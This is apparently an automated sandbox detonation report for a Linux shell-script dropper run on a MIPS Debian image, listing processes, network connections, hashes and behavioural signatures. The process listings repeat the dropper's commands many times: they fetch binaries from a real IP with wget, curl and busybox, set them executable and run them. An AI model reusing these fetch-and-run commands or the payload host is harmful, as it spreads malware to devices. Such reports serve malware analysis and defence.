[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
debian9-mipsel-20240611-en
Max time kernel
94s
Max time network
97s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
